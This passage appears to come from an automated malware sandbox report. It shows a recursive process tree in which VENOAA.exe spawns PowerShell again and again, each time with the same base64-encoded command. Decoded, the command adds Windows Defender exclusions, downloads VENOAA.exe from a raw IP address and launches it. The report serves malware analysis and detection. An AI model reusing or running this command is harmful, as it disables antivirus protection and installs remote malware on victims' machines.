wAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        56⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        57⤵
        Executes dropped EXE
        
        PID:5028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        58⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        59⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        60⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        61⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        62⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        63⤵
        Executes dropped EXE
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        64⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        65⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        66⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        67⤵
        Executes dropped EXE
        
        PID:116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        68⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        69⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        70⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        71⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        71⤵
        Executes dropped EXE
        
        PID:4020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        72⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        73⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        74⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        75⤵
        Executes dropped EXE
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        76⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        77⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        78⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        79⤵
        Executes dropped EXE
        
        PID:432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        80⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        81⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
